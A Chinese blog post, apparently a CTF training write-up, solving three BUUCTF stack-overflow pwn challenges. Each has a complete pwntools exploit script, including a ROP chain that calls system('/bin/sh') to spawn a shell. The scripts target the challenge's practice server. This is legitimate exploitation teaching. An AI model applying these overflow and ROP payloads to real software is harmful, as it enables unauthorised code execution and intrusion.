buuctf刷题(2)【13题 - 】

最新推荐文章于 2024-05-05 22:46:05 发布
最新推荐文章于 2024-05-05 22:46:05 发布
阅读量370 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/106162618
版权

not_the_same_3dsctf_2016

一开始看到这两个函数,直接栈溢出,跳过来不就行了,,,没注意看,get_secret,是指将flag读入了f14g,并没有打印出来呢,所以我们还需要自己打印一下

搜了一下,有write函数,那就调用它

#coding=utf-8
from pwn import *
connect = 1#连接本地
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='29206'#IP地址
main_addr = 0x080489E0
secret_addr = 0x080489A0
write_addr = 0x0806E270
fl4g = 0x080ECA2D

if connect:
    p=remote(port,ip)
else :
    p=process("./"+fileName+"")
#p.recvuntil("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ")
#跳到get_secret,先让flag读入,最后返回main
p.sendline("a"*0x2d+p32(secret_addr)+p32(main_addr))
#调用write函数读出
p.sendline("a"*0x2d+p32(write_addr)+p32(main_addr)+p32(1)+p32(fl4g)+p32(0x100))
p.interactive()

 

 

jarvisoj_level0

一道简单的栈溢出,也给了后门函数

覆盖量为0x80,还有ebp,接下来加上后面函数的地址即可

#coding=utf-8
from pwn import *
connect = 1#连接
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='26257'#IP地址

if connect:
    p=remote(port,ip)
else :
    p=process("./"+fileName+"")

p.recvuntil("d")
p.sendline("s"*0x80+p64(0x0)+p64(0x0400596))
#p.sendline("s"*0x80+p64(0x0400596))
p.interactive()
    
    
p.interactive()

[HarekazeCTF2019]baby_rop

emmm,又一道超级简单的水题,,,,

输入没有控制大小,可以溢出,覆盖率为0x10+0x8

程序里面有system和binsh,组合一下就可以

因为是64位的程序,用寄存器传值,所以还要找一个pop rdi;ret

然后就可以写exp了

#coding=utf-8
from pwn import *
connect = 1#连接
fileName=''#文件名
port='node3.buuoj.cn'#端口
ip='25312'#IP地址

if connect:
    p=remote(port,ip)
else :
    p=process("./"+fileName+"")
system_addr = 0x000400490
binsh_addr = 0x0601048
rdi_addr = 0x000400683 
ret_addr = 0x040061A

p.recvuntil("name?")
payload='a'*0x10+p64(0x0)#覆盖量
payload+=p64(rdi_addr)
payload+=p64(binsh_addr)#将binsh进入寄存器
payload+=p64(system_addr)#调用system函数
payload+=p64(ret_addr)#可加可不加
payload+=p64(0x04005D6)#返回地址,main,可以有可没有

p.sendline(payload)
p.interactive()

 

书文的学习记录本
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF逆向前八
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向目,通过这些目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道首先使用exeinfo查看文件信息,确认...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
2. **extract()函数使用不当**: `extract()`函数会从数组中提取键作为变量名,并将对应的值赋给这些变量。如果不小心使用了未经过滤的用户输入数据作为此函数的源数组,攻击者可以指定恶意的键值对,覆盖原本的...
AWD-Test2
shinygod的博客
04-07 2839
00x1-eval后门 先用D盾扫一波 00x2-日志包含 原理: `log1.php``会把我们的请求以及其他的一些信息写进根目录下的log.php中。 然后我们进入log.php时,就会解析我们的shell了。 也就是有POST或者GET传参的地方,就能getshell 在任意位置添加一句话马,然后在/log.php,getshell 或者… 00x3-ping 在user.php中的ping,可以用管道来getflag 漏洞引发顺序: index.php中的$c值在function.p
REVERSE-PRACTICE-BUUCTF-13
P1umH0的博客
02-26 340
REVERSE-PRACTICE-BUUCTF-13firmware[ACTF新生赛2020]Oruga[Zer0pts2020]easy strcmp[GXYCTF2019]simple CPP firmware .bin(二进制)文件,由目提示可知是路由器固件逆向 参考:逆向路由器固件之解包 Part1 linux安装好binwalk和firmware-mod-kit binwalk会分析二进制文件中可能的固件头或者文件系统,然后输出识别出的每个部分以及对应的偏移量 binwalk该二进制文件,发现包
[HarekazeCTF2019]baby_rop[BUUCTF]
最新发布
moonlightsunshin的博客
05-05 298
这个时候思路就很清晰了根据64位函数传参的特点构造ROP链就行,32位与64位传参的区别这里就不再赘述,读者可以看上一篇jarvisoj_level2_x64[BUUCTF] ,根据名字可以猜到这道考的rop同时是64位的程序。用find -name flag查找路径再cat。
Web学习之路(BUUCTF刷题之旅2)
AKAXPD的博客
01-18 1551
一、[SUCTF 2019]EasySQL [SUCTF 2019]EasySQL 这里发现输入非零数字都有回显,输入字母无回显。 这里猜测到内部的查询语句可能有 || 。 输入1'无回显,果然时SQL注入。(应该是关闭了错误回显,报错注入不可行) 用order去试探有多少个字段,回显为“Nonono.”。这里应该是order by参数被过滤掉了,联合查询不可用了。 1' and length(database())>=1# 试试盲注(布尔盲注)。 1 an..
BUUCTF~Misc~Test2
m0_47643893的博客
02-02 1047
目录FLAG隐藏的钥匙假如给我三天光明最简单的misc-y1ngA_Beautiful_Picture神秘的龙卷风小姐姐-y1ng后门查杀荷兰宽带数据泄露来首歌吧数据包中的线索九连环面具下的flagwebshell后门被劫持的神秘礼物刷新过的图片Snake圣火昭昭-y1ng梅花香之苦寒来菜刀666总结 FLAG 在Stegsolve中发现有zip文件,导出之后发现压缩包文件损坏,我们用winrar修复文件,然和就可以解压了,看到是elf文件可能是逆向就用IDA打开然后就看到了flag flag{dd0gf4
BUUCTF刷题记录 [Reverse]
weixin_45225566的博客
01-02 282
BUUCTF刷题记录 [Reverse]
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解思路)
01-27
BUUCTF-MISC-WP(详细解思路)
buuctf [BJDCTF 2nd]test
carol2358的博客
05-06 429
中间输入yes 连上 ssh -p 25274 ctf@node3.buuoj.cn ls看到三个东西 flag没有权限 cat test.c #include <stdio.h> #include <string.h> #include <stdlib.h> int main(){ char cmd[0x100] = {0}; puts...
BUUCTF-web刷题记录-2
qq_45628145的博客
07-27 427
[极客大挑战 2019]HardSQL 一个登陆框,简单测试一下很多包括union等字符被过滤了,这里这样构造可以成功登录,但是没有flag,所以是要把flag从数据库读出来了 admin'Or(1)# 1 发现^没有被过滤,可以用来代替and,与extractvalue函数结合来尝试进行报错注入 这个函数在这里的大致用法是这样的,extractvalue(null,concat(0x7e,user(),0x7e)),中间的user()即为你想执行的查询语句 接下来这就是爆库,爆表,爆字段,爆内容的基本
buuctf13-17
XDiku的博客
01-29 137
ok
BUUCTF逆向练习记录(wp) --(4)(偷懒三
Air_cat的博客
09-18 475
[GKCTF2020]BabyDriver 简单win驱动。 拖ida仔细分析即可。 注意寻找关键函数。 [FlareOn6]Overlong 这个人认为非常有意思 考察的点在于①发现数组长度远大于给的长度参数0x1c②通过动调直接得出结果。 这一还给了一个附件,提示运用正确的方法进行解密可以很快得到flag,而我们知道,ctf的re中,最快的解密往往就是动调一把梭。 需要大胆猜想,大胆尝试。 [WUSTCTF2020]Cr0ssfun 额,无脑拼接嗷 ...
[Black Watch 入群]Web
SopRomeo的博客
05-28 1767
登录抓包 这是一段以json传入的数据,起初对着这个一直想json注入,然后发现怎样注入都行不通 回到热点列表 发现更改后面的数字会变,谷歌浏览器f12 network 谷歌浏览器f12 network 发现有个php文件,进去 数据存放在这里了,输入双引号的时候发现弹出这个 sql注入无疑了 刚开始的id是1,由此推断可能是整形注入 但是联合查询,报错都没用 bp测试看他究竟过滤了啥 啥都没过滤 卡了挺久的,翻了翻自己博客 极客大挑战finalsql 异或布尔盲注 这有个坑,他返回.
BUUCTF刷题总结(基础篇)
weixin_51614272的博客
05-15 2217
目录[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Upload[极客大挑战 2019]BabySQL[ACTF2020 新生赛]Upload[极客大挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
roarctf_2019_realloc_magic
z1r0的博客
03-04 508
roarctf_2019_realloc_magic 查看保护
buuctf中Upload-Labs-Linux
07-16
buuctf upload-labs-linux 是一个基于 Linux 平台的上传漏洞实验室,旨在帮助安全从业人员学习上传漏洞的原理和利用方法。该实验室提供了多个不同难度级别的漏洞场景,用户可以通过上传恶意文件、绕过文件类型限制、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值